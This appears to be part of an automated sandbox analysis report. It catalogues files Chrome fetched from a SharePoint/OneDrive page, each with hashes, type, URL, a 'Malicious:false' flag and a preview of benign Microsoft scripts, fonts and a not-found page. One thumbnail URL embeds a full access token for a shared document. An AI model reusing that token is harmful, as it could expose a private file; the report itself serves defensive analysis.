                                                          SHA-256:B862306928A5699966E7579C3AF5A857D4C2B634F764D45DEA2F6360DFCD5888
                                                          SHA-512:B34C5D8994B6C3CA5FE8B7E1C8988DFC90AAF0E9B7ED2583D6D7A46C17FE8428099BDDBB5E640F2E00832263635A0F9C02360FCB3AF402CFC7294910BE874659
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/fluenthybridfont/odsp-next-icons-6-7ab2496d.woff
                                                          Preview:wOFF......;0......z.........................OS/2.......G...`1=h.cmap...P...j.....r..gasp................glyf......3...jL...head..5....4...6#...hhea..6........$....hmtx..6 ...r.......loca..6.........}5..maxp..7`....... .r..name..7x.......O..R.post..;........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px.......`u,......9..c.x...I(.P.....!E.z.H.!ea(S......G.z.BXJ.2..<CI,...N2-H....d.....(;N.{:....QJ.....W.N=.l...Z.!....S..Lf3.y.g..hf%kia=...n.......G9..Nr..\.:7....q..<..OxJ......y.;>..|.%...{q.'q..q.w..O.x........DH.DI..R?.j>e]Z..Ef..-..m.~.m..od/6...2,a.s...V1.+.p.1.`...@/..6T`.M.....D..Q.....%hF....G........HB....l.b.... .Y.@ ......A.N.!..p3=..M....+..28.......C.l..............x..}.`..hU..............s$.i[.X.-..e.....`........q .`...Ip.,I... ..9.....d....!.I...-M.WUw.F.l..........U.zU.....p......r...p..5cQznq......72..8.8....~.`....\.>...@...=0.Cg3I*.../..S.o.....ed.4k....~I*.ez.N.{ j..\v*.M.N...{..."...H...#)/s.G.?.....j...h~"....a{M..qZZ.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (59323)
                                                          Category:dropped
                                                          Size (bytes):167732
                                                          Entropy (8bit):5.345735928321739
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:BCEC504886A7742B3C9DF439AB869AF2
                                                          SHA1:D8757E56D685D617C4A63412FA20B5C6D213C1A8
                                                          SHA-256:2C3AC8C59B8809E15DEB91682416FA478F9CF1DEB59A9908F0B82F097665204D
                                                          SHA-512:9C1A4B317454653901359A2D4CE55E6CEF569A31515C665A3FA4396A380BEA91D6037B20DC713320CAD91CFEE0C8618B7EEDFC78BE6E0910669D242DEC36F19F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:/*! For license information please see spwebworker.js.LICENSE.txt */.(()=>{"use strict";var e=[(e,t,n)=>{function a(e,t){for(var n="";n.length<e;){var a=16*(null!=t?t:Math.random)();n+=(a|=0).toString(16)}return n}function i(){return crypto.getRandomValues(new Uint32Array(1))[0]/4294967296}n.r(t),n.d(t,{Empty:()=>r,_guidRegEx:()=>o,cryptoRandom:()=>i,generate:()=>s,isValidGuid:()=>u,normalizeDashes:()=>l,normalizeLower:()=>c,normalizeUpper:()=>d});var r="00000000-0000-0000-0000-000000000000",o=/^[0-9a-f]{8}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{12}$/i;function s(e){var t=[];t.push(a(8,e)),t.push(a(4,e));var n="4"+a(3,e);t.push(n);var i=a(4,e),r=parseInt(i[0],16);return r&=3,i=(r|=8).toString(16)+i.substr(1),t.push(i),t.push(a(12,e)),t.join("-")}function c(e,t){return void 0===t&&(t=!1),e?f(e.toLowerCase(),t):""}function d(e,t){return void 0===t&&(t=!1),e?f(e.toUpperCase(),t):""}function l(e,t){if(void 0===t&&(t=!1),e){var n=e.replace(/[^A-Fa-f0-9]/g,"");if(32===n.length)retu
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (36587)
                                                          Category:downloaded
                                                          Size (bytes):38787
                                                          Entropy (8bit):5.321390760222595
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:33994475D4B5E89D1FDBF42C7738C010
                                                          SHA1:14457FAC734F6C3458CAF0B08B17D2C56A57FA9C
                                                          SHA-256:648C85443B3D55C4CB0EF36A947BB2CB9AB20BC6D404CDC19D7B0DA9539CE741
                                                          SHA-512:DC59DA88F193430CCE3950F27639DBC4068A7DAD6E4310852E294734EBF0AB0084597F17C776A4228AC10944626F5C673CDD7B08A7447D9ADEC52D5091EF578E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/251.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[251],{4417:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return a},c:function(){return s},d:function(){return o}});var a,i,r=n(745);function o(e){return(null==e?void 0:e.notificationType)===r.b.DataSyncListStatusChange}function s(e){return(null==e?void 0:e.notificationType)===r.b.FonDNotification}!function(e){e[e.UnknownError=0]="UnknownError"}(a||(a={})),function(e){e[e.SetupRequired=0]="SetupRequired",e[e.SignInRequired=1]="SignInRequired"}(i||(i={}))}.,2442:function(e,t,n){n.r(t),n.d(t,{spFolderItemSetItemAutoRefreshControlHandler:function(){return we}});var a,i=n("tslib_538"),r=n("react-lib"),o=n(337),s=n(40),c=n(22),d=n(5),l=n(57),u=n(123),f=n("odsp.util_517"),p=n(931),m=n(9233),_=n(1296),h=n(10);!function(e){e[e.New=0]="New",e[e.Update=1]="Update",e[e.Delete=2]="Delete"}(a||(a={}));var b=12e4,g={ODB:459},v=function(){function e(e){var t=this;this.isImproveRetryLogicKillswitchActivated=f.x9.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format, TrueType, length 15684, version 1.3277
                                                          Category:downloaded
                                                          Size (bytes):15684
                                                          Entropy (8bit):7.974866409378684
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:24C258ECCFD20FD3555F8453E85186F5
                                                          SHA1:4E75C8645A27E405B1AB24D792338E8C5E7F275D
                                                          SHA-256:BB7D87F5E6D6CDC14E181C73155A749185331D912290A284C7A3369BBD587670
                                                          SHA-512:5789F77F91A4B6555C8EA75119562BDF0CB884F5FBF84E8B22D6C785F13E85EF6CF8B2CE445C7D07BA355D502C05C4810B55C2FA389997D2365A06C60D1B82AE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/fluenthybridfont/odsp-next-icons-2-7b0250ce.woff
                                                          Preview:wOFF......=D......o4........................OS/2.......G...`,.d5cmap...P.........G..gasp................glyf......5...`.P...head..7....2...6#...hhea..80.......$....hmtx..8L...Z....%...loca..8.........wZ..maxp..9t....... .r..name..9........O..R.post..=0....... ....x.c`a..8...........L..t.!.I.(......@9......VP`pxr..5.0.B2..@x....\O.u.x.....AQ...9.,<.....!r......7`ioe%.......K.$......j...."..=)2.J.z..ng(.nu..=.U...G....F...0..k..ZK.Kg.z..E.....0uv...R.@|)IQ..IL.....G............/.?...BN...............x..|.`....V..-.%[.,K.}.|[..#v.;...q..'6$$."..M .H.4I)W. .....-y..b.<..}..+.ymS....B.....n.ofwe..P.&.......7..}..A.!....X.#..^3.5{57...n..y..6~.....S..!t._.C..h&.B.R..U.56.I..+.....l.k7..G2pu....h.@..bV+.V-.@m;.{..={>~...mP~..={....]m...N.82.........}i..v..#.X}.Ng..F..<k......H....Y..c.C..I=.|.{G..5.../....(.......v...6_....y..F..tD..N..R..0u.......^.........b..K X..O.>L...F..M8Te....%..B..._.[v.%...q....i.....=<..-.~..../qbl.t:...s.7.^s.....+'.....V..L.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (1232)
                                                          Category:downloaded
                                                          Size (bytes):1237
                                                          Entropy (8bit):4.947310023456463
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:F8F9C192D347ED95427BD2133A5E90EE
                                                          SHA1:17B17AA3DB0A68FA908BB5352CDED86582426080
                                                          SHA-256:72ED7F02F576E81E0154C44E65B962A86FD56CBF31E90FA27BB5A20F31E90648
                                                          SHA-512:8724F5197603A8AFE6096759EADFCBEB66A70497CB5B9C7A77792732B1391F02632F0CBC1D919175B93DE2FAEC5EB32A09ADB2123A6D874A95A2D561D05ABFC2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/30099.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[30099],{830099:(e,t,n)=>{n.d(t,{DYX:()=>r,L4E:()=>o,Lu3:()=>i,Po1:()=>s,zJg:()=>c});var a=n(639691);const i=(0,a.U)("Add20Regular","20",["M10 2.5a.5.5 0 0 0-1 0V9H2.5a.5.5 0 0 0 0 1H9v6.5a.5.5 0 0 0 1 0V10h6.5a.5.5 0 0 0 0-1H10V2.5Z"]),r=(0,a.U)("Add24Regular","24",["M11.75 3c.38 0 .7.28.74.65l.01.1V11h7.25a.75.75 0 0 1 .1 1.5H12.5v7.25a.75.75 0 0 1-1.49.1V12.5H3.74a.75.75 0 0 1-.1-1.5H11V3.75c0-.41.34-.75.75-.75Z"]),o=(0,a.U)("ArrowCounterclockwise24Regular","24",["M12 4.5a7.5 7.5 0 1 1-7.42 6.4c.07-.46-.26-.9-.72-.9-.37 0-.7.26-.76.62A9 9 0 1 0 6 5.3V4.25a.75.75 0 0 0-1.5 0v3c0 .41.34.75.75.75h3a.75.75 0 0 0 0-1.5H6.9a7.47 7.47 0 0 1 5.1-2Z"]),s=(0,a.U)("ArrowExportLtr16Regular","16",["M1.5 3c.28 0 .5.22.5.5V12a.5.5 0 0 1-1 0V3.5c0-.28.22-.5.5-.5Zm9.15.65c.2-.2.5-.2.7 0l3.5 3.5c.2.2.2.5 0 .7l-3.5 3.5a.5.5 0 0 1-.7-.7L13.29 8H4.5a.5.5 0 0 1 0-1h8.8l-2.65-2.65a.5.5 0 0 1 0-.7Z"]),c=(0,a.U)("
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (48338)
                                                          Category:downloaded
                                                          Size (bytes):51414
                                                          Entropy (8bit):5.248847552947305
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:FB715233AC92493C3DB1EB8084A53A98
                                                          SHA1:5E44DC1EC95A57362CD06EC7FB3010A2F563DF93
                                                          SHA-256:7C2206C58B7F88CFE73F74B269E609323AE0FF47D75BAD31165F40477931EBF7
                                                          SHA-512:D2709272EC1499D3CE6F79315E26468D3996B4FE69FC289A2D24CE14CEA5ED4E5E9FF9E98EC250718CC8B3FEF13B2EA32CC363DB52420A3E9F8E9AB3338980FF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://shell.cdn.office.net/shellux/suiteux.shell.responsive.2b01bd6b8a95ca4b9740.js
                                                          Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_responsive_start"),(self["suiteux_shell_webpackJsonp_suiteux-bootstrapper"]=self["suiteux_shell_webpackJsonp_suiteux-bootstrapper"]||[]).push([["responsive"],{1151:function(e,t,n){(t=e.exports=n(2)(!1)).push([e.id,"html[dir=rtl] ._7PGqXIlT8jItdB8fOBmFkg\\=\\={transform:scaleX(-1);-moz-transform:scaleX(-1);-webkit-transform:scaleX(-1);-ms-transform:scaleX(-1)}",""]),t.locals={iconFontRTL:"_7PGqXIlT8jItdB8fOBmFkg=="}},9634:function(e,t,n){(t=e.exports=n(2)(!1)).push([e.id,'.M3pcB5evSAtYMozck1WU7A\\=\\={height:100%;line-height:48px;display:flex}._1QSK5lUhw5Gkh7SDz97ZPQ\\=\\={height:48px;display:flex}.siUMOJwnumycxvszBe3uzQ\\=\\={display:inherit;flex:inherit;justify-content:inherit;order:inherit;align-self:inherit;min-width:inherit}.\\/DyMYj2gNfPrYNbEWoV2\\/w\\=\\={font-size:14px;font-family:SegoeUI-Re
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text, with very long lines (611)
                                                          Category:downloaded
                                                          Size (bytes):27150
                                                          Entropy (8bit):4.357340680151037
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:46DD133EE00DC1BAE5E4EEBA7B88432F
                                                          SHA1:8AF86A4AC91CE48C062216FB94A6E1D57618A19B
                                                          SHA-256:9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66
                                                          SHA-512:CB49F9E3812E2C262AF374E79BD8905CB508A45BF2C2D6AF62EED85AF43770872486A55E9425882FEDA9FB3A57A317A3C18BE1E286ADAF0C76BE7F1B0DFA8474
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/favicon.ico
                                                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Not Found</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. @keyframes eye-1 {. 0% {. transform: translateX(0);. }. 10%,. 50% {. tr
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 643x1024, components 3
                                                          Category:downloaded
                                                          Size (bytes):33211
                                                          Entropy (8bit):7.430131915770487
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:D84CE49741BA8730A4D86365C4F415E7
                                                          SHA1:3E1694C0C594C893E93D4DB42AF893BB4ED7D9BA
                                                          SHA-256:1EA6F329C83612C441867E26E7FF035B1113B78AE76F20E5D2809170E3914E47
                                                          SHA-512:F4D5C9E1635216E55E4F2A73CB506C9B8F5DE5D9CA8D60DF50F61D5EA2CE5B790704EFB847F5200A7A48939F93C668B9342D044593C7B227957B292E4AACB93A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://westus31-mediap.svc.ms/transform/thumbnail?provider=spo&inputFormat=pdf&cs=fFNQTw&docid=https%3A%2F%2Fmyarrowleaf1-my.sharepoint.com%3A443%2F_api%2Fv2.0%2Fdrives%2Fb!OgvKMgJJ9Ea65BeF2BY-V6W1OLarDu1HoCcHG8Sy7LVrRUtZZs2tRJhB4YCxl3mi%2Fitems%2F01264PSCVAJAVZSGAQCVE3HZAIDZ7WQTLE%3Fversion%3DPublished&access_token=v1.eyJzaXRlaWQiOiIzMmNhMGIzYS00OTAyLTQ2ZjQtYmFlNC0xNzg1ZDgxNjNlNTciLCJhdWQiOiIwMDAwMDAwMy0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAvbXlhcnJvd2xlYWYxLW15LnNoYXJlcG9pbnQuY29tQGRhMTM0ODQwLWRiNWEtNDllMy05NDg4LTZmNTU4ZWVmNGFhZSIsImV4cCI6IjE3MzE2Mjg4MDAifQ.CiMKCXNoYXJpbmdpZBIWa1JVM3V5Ykdwa09zbkVSQkZtVnRhQQoICgNzdHASAXQKCgoEc25pZBICMzMSBgjU2zoQARoOMTczLjI1NC4yNTAuOTEiFG1pY3Jvc29mdC5zaGFyZXBvaW50Kix5L0dnSFRqQmtZQzdRY29TQkJ4MXZvdEVFNEUwck9zVGFGdkJXL2pZMGJzPTB6OAFKEGhhc2hlZHByb29mdG9rZW5iBHRydWVyYTBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uIzJmZjQ4NjljOGY3ODFjMzA0MjE0YjNkODA4MTNlZmZiMjQ2ZmU2NGIzYjQwM2RiZjc3YzNmNmE1NGJkNmIxMTd6ATDCAWEwIy5mfG1lbWJlcnNoaXB8dXJuJTNhc3BvJTNhYW5vbiMyZmY0ODY5YzhmNzgxYzMwNDIxNGIzZDgwODEzZWZmYjI0NmZlNjRiM2I0MDNkYmY3N2MzZjZhNTRiZDZiMTE3.m4_iJxDLqP9rOpKWfHdO3RgFgYAMKLvEuJoAhAjyEs4&cTag=%22c%3A%7B992B48A0-1018-4915-B3E4-081E7F684D64%7D%2C1%22&encodeFailures=1&width=1024&height=1024&srcWidth=&srcHeight=
                                                          Preview:......JFIF.....`.`.....C..............................................%.. !###..&)&")."#"...C..........."...""""""""""""""""""""""""""""""""""""""""""""""""""...........".........................................\...........................!..1AQ"aq.....23Rr.....#4UV....$Bb.5s....%7t....CEcu....&FT....................................:........................!1Q...AS...."Ra..23qBC...#45.r..............?................................................................................................................................................................................................3...>......... ...........@..@.............................................................\!....i[.N.V.Gr.E.R~.R...T..k.7cg,......"..X..}......55K#.W...\...'4.....7N.4.s....T..I.N.s..EUU.59.\..tz.V....<....:F...."v.U?.#^.\..x.....a.:F...IG.-3..}...!D.".$j.q.\.SaU...f......Z....TT\v..........g..7:w*-.&"w........i..Z{429..s....j./..!...a...S.$3O=+.......^J...-1Ei.'GS.z.(a.F..b..#b.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (10653)
                                                          Category:downloaded
                                                          Size (bytes):16023
                                                          Entropy (8bit):5.43785852910499
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:456D47F75E97CDC8D1CEA134720D2446
                                                          SHA1:E730CF442CAA51AF0FFD438EA1C95FFB0D900AC3
                                                          SHA-256:2AD22A2DEFCD13153C1B4C76DFCF91099830284E0E995ED605D4B27C4E8719E5
                                                          SHA-512:053C234649D077E40F75DBAD1F6477A4673B67E9D3ECB79A17D3BF1B96E54681B462BE4D41F8744029156F195B91AEF55A27F9C46E88D664D57377635CDE8C74
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/77717.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[77717],{70703:(e,t,n)=>{n.d(t,{d:()=>C});var a=n(539155),i=n(971296),r=n(404921),o=n(312432),s=n(953503),c=n(916956),d=n(931041),l=n(490539),u=n(736892),f=n(825268),p=n(146748),m=n(698820),_=n(695799),h=n(288820);const b=(0,m.y)("r2i81i2","rofhmb8",{r:[".r2i81i2{align-items:flex-start;box-sizing:border-box;display:inline-flex;position:relative;}",".r2i81i2:focus{outline-style:none;}",".r2i81i2:focus-visible{outline-style:none;}",".r2i81i2[data-fui-focus-within]:focus-within{border-top-color:transparent;border-right-color:transparent;border-bottom-color:transparent;border-left-color:transparent;}",'.r2i81i2[data-fui-focus-within]:focus-within::after{content:"";position:absolute;pointer-events:none;z-index:1;border:2px solid var(--colorStrokeFocus2);border-radius:var(--borderRadiusMedium);top:calc(2px * -1);right:calc(2px * -1);bottom:calc(2px * -1);left:calc(2px * -1);}',".rofhmb8{align-items
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (3000)
                                                          Category:downloaded
                                                          Size (bytes):9266
                                                          Entropy (8bit):5.4275631303380525
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:DBF06FC2E5FB93A4FD81BF25DA9D55A5
                                                          SHA1:606DBD184C6C6C8E974EEE08E465745D84FF6EAE
                                                          SHA-256:1A6312F935405284E20F268B2D90A5663EE63C777CE8E1A7627F058A901E8E89
                                                          SHA-512:BFA1149A65EB8B7A7EE27A4CFADEB2517543CF2A32953F47AE0B239A3C520DFCF43B7A919C965592036CBCB396E3678DE0DFA5D426548178ED593ABF3F036514
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/131.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[131,130],{1173:(e,t,n)=>{n.d(t,{a:()=>s,b:()=>o});var a=n(432),i="__dlgRoot",r="__overlay";function o(e){var t=document.getElementById(i);if(!t){if((t=document.createElement("div")).id=i,t.setAttribute("automation-id",i),e){var n=document.createElement("div");n.id=r,n.setAttribute("automation-id",r),n.classList.add(a.u),t.classList.add(a.g),setTimeout(function(){n.classList.add(a.v),null==t||t.classList.add(a.h)},50),document.body.appendChild(n)}document.body.appendChild(t)}return t}function s(){var e=document.getElementById(i),t=document.getElementById(r);null==e||e.classList.add(a.f),null==t||t.classList.add(a.t),setTimeout(function(){var n,a;null===(n=null==e?void 0:e.parentElement)||void 0===n||n.removeChild(e),null===(a=null==t?void 0:t.parentElement)||void 0===a||a.removeChild(t)},600)}}.,843:(e,t,n)=>{n.r(t),n.d(t,{VersionHistoryActionExecutor:()=>y});var a=n("tslib_538"),i=n(1),r=n(1173),o=n("odsp.uti
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Java source, ASCII text
                                                          Category:downloaded
                                                          Size (bytes):742
                                                          Entropy (8bit):5.236541682457806
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:1B48AA9555C967A00DAD6DFCE0B9A861
                                                          SHA1:9F56297198E204E86A34A686176EF7C09AD6CAB0
                                                          SHA-256:C595976F98074BC9C90EF1A4FBDBE968357B0FBFF4DBEC093524E96FBA60791A
                                                          SHA-512:04956F3EC9B56D932AA909D1881B7837FE02034FC96FD5EA46FA44971BEBD42285F388E66863CBE87108E1B7D394FA1526832908BCF8F2CEFD8353D9833D49DF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://myarrowleaf1-my.sharepoint.com/_layouts/15/spwebworkerproxy.ashx
                                                          Preview:self._perfMarks = {};.self._markPerfStage=function(key) {if(self.performance && typeof self.performance.now === 'function'){self._perfMarks[key]=self.performance.now();} else{self._perfMarks[key]=Date.now();} if (self.performance && typeof self.performance.mark === 'function') {self.performance.mark(key);}};.(typeof self._markPerfStage === 'function' && self._markPerfStage('importScriptsStart'));.self._cdnBaseUrl = 'https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.005/';.importScripts('https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.005/spwebworker.js');.self._wwKillSwitches = {'48FEA7A5-5A77-480B-94EB-43F1937DF4D6':true};.(typeof self._markPerfStage === 'function' && self._markPerfStage('importScriptsEnd'));.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (1886)
                                                          Category:downloaded
                                                          Size (bytes):1891
                                                          Entropy (8bit):5.177276698386844
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:94CAD90E4D82246E9FE7A9B081072DD7
                                                          SHA1:CBE684E867D256A4395E51CB67E313B0FE30C55B
                                                          SHA-256:C09EEC70BAC6B66D35DBED1412E3F9F068F671518883522CCA91E7C07B1B1100
                                                          SHA-512:4EEF348872447FC9D12B8E5E73469CEC3E1CC5E7ADD926C40F847158F0FF823D36CB5E7DEA15BACBD020583524BDA609A1A49AA686330C94061EB3CB32C5202D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/178.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[178],{2306:(e,t,n)=>{n.r(t),n.d(t,{columnTypes:()=>y});var a=n(2798);const i=n.p+"images/Text_55a7d95e.svg",r=n.p+"images/Hyperlink_fff7e50c.svg",o=n.p+"images/Choice_12cea9ef.svg",s=n.p+"images/Number_f2b99b17.svg",c=n.p+"images/Date_dfef8d21.svg",d=n.p+"images/Currency_8e697e75.svg",l=n.p+"images/MultilineText_d7d11fcb.svg",u=n.p+"images/Location_97d633bd.svg",f=n.p+"images/Person_577f06ca.svg",p=n.p+"images/Image_9d432a08.svg",m=n.p+"images/Boolean_31f6453e.svg",_=n.p+"images/Lookup_7d6e5aa8.svg",h=n.p+"images/ManagedMetadata_2cabd715.svg",b=n.p+"images/ContentType_162b1610.svg",g=n.p+"images/More_b34950f3.svg",v=n.p+"images/Rating_00de6e83.svg";var y={text:{description:a.M,title:a.N,image:i,iconName:"TextField"},hyperlink:{description:a.n,title:a.o,image:r,iconName:"Link"},choice:{description:a.e,title:a.f,image:o,iconName:"ChoiceColumn"},number:{description:a.C,title:a.D,image:s,iconName:"Number"},dateAn
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (61927)
                                                          Category:downloaded
                                                          Size (bytes):67299
                                                          Entropy (8bit):4.830055605911916
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:E9E47B9698D49B3CEFAEA43B094B77F5
                                                          SHA1:D8D3E50135B59269DC211E18F6ECA748DE8EE603
                                                          SHA-256:E69B52BDC517E45B444FC4B4642144B5CD25627E7642AEEBC816847F5836CEF2
                                                          SHA-512:39600C6A38A52D726FBAD26F8AF8983B107DD482B90C9F867204783EFBF1E4AF45CDEB4995A43904431B7B12B1C6DA87780D2336F23097FC84555DF9B94AA136
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/stsserviceworkerprefetch/stsserviceworkerprefetch.js
                                                          Preview:.if (typeof self !== 'undefined') {. const versionedPaths = ["@ms/stream-bundle/chunks/1180.js","@ms/stream-bundle/chunks/1791.js","@ms/stream-bundle/chunks/20563.js","@ms/stream-bundle/chunks/22412.js","@ms/stream-bundle/chunks/23363.js","@ms/stream-bundle/chunks/24997.js","@ms/stream-bundle/chunks/25506.js","@ms/stream-bundle/chunks/27281.js","@ms/stream-bundle/chunks/28941.js","@ms/stream-bundle/chunks/29255.js","@ms/stream-bundle/chunks/30099.js","@ms/stream-bundle/chunks/33623.js","@ms/stream-bundle/chunks/3517.js","@ms/stream-bundle/chunks/37456.js","@ms/stream-bundle/chunks/38564.js","@ms/stream-bundle/chunks/41677.js","@ms/stream-bundle/chunks/41800.js","@ms/stream-bundle/chunks/47269.js","@ms/stream-bundle/chunks/49804.js","@ms/stream-bundle/chunks/53319.js","@ms/stream-bundle/chunks/53379.js","@ms/stream-bundle/chunks/56643.js","@ms/stream-bundle/chunks/56770.js","@ms/stream-bundle/chunks/59721.js","@ms/stream-bundle/chunks/59926.js","@ms/stream-bundle/chunks/61251.js","@ms/
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (5977)
                                                          Category:dropped
                                                          Size (bytes):7855
                                                          Entropy (8bit):5.301452419908827
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:75191AE76977B8B774EF29BC16BE0344
                                                          SHA1:D40954575397982EEB50104AC75D0C84105ACA4A
                                                          SHA-256:968A1D563357434361785FC3CB05752CF1CEB29D2A472BA4F0684281776DF72B
                                                          SHA-512:A36E077295D5AC8CD30D27DD53801CE57B2C554CD0924D651566725CF40820359E4A18F91E3D6CA8EF9800F3CBEE977DB2964F73AC35EEEA23DF9FD49E81F48A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[473],{4539:function(e,t,n){n.d(t,{a:function(){return E}});var a=n("tslib_538"),i=n("react-lib"),r=n("fui.core_932"),o=n(48),s=n("fui.util_175"),c=n(4096),d=(0,r.FQH)({from:{transform:"rotate(0deg)"},to:{transform:"rotate(360deg)"}}),l=function(e){return(0,r.FQH)({from:{height:0},to:{height:e}})},u=function(e){return(0,r.FQH)({from:{height:e},to:{height:0}})},f=(0,r.FQH)({from:{transform:"scale(0.9, 0.9)"},to:{transform:"scale(1, 1)"}}),p=(0,r.FQH)({from:{opacity:0},to:{opacity:1}}),m=(0,r.FQH)({from:{opacity:1},to:{opacity:0}}),_=(0,s.e_)(function(e){var t,n=e.theme,a=e.className,i=e.animateStatusIcon,s=e.toastState,_=e.animate,h=e.hasProgressIndicator,b=e.toastHeight,g=void 0===b?h?54:48:b,v=n.palette,y=n.effects,S=n.isInverted;return{root:[(t={overflow:"hidden",backgroundColor:v.neutralPrimary,borderRadius:"4px",boxShadow:y.elevation16,color:v.neutralLight,marginBottom:"12px",position:"relative",width:"390
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (25256)
                                                          Category:dropped
                                                          Size (bytes):25561
                                                          Entropy (8bit):5.4874049203854485
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:E3BCD923933DCD7735C67557A1EF47DC
                                                          SHA1:575E4ABA32E23C2934F430FAE8A035C952DC27C6
                                                          SHA-256:8169AA6F30F23C5CEB196E4B1BB68CF378C15F29AF7E6D4E1F42AA6D5538DAB7
                                                          SHA-512:6A70172C69639267A6D5242D93DFD688376F9FBACD5F1D5C5DA9369FA1E70EFEC4C76888A2B7B0A1B7FA5232591102E66DA542DDCC818D30AE47982D04E8A7C3
                                                          Malicious:false
                                                          Reputation:unknown
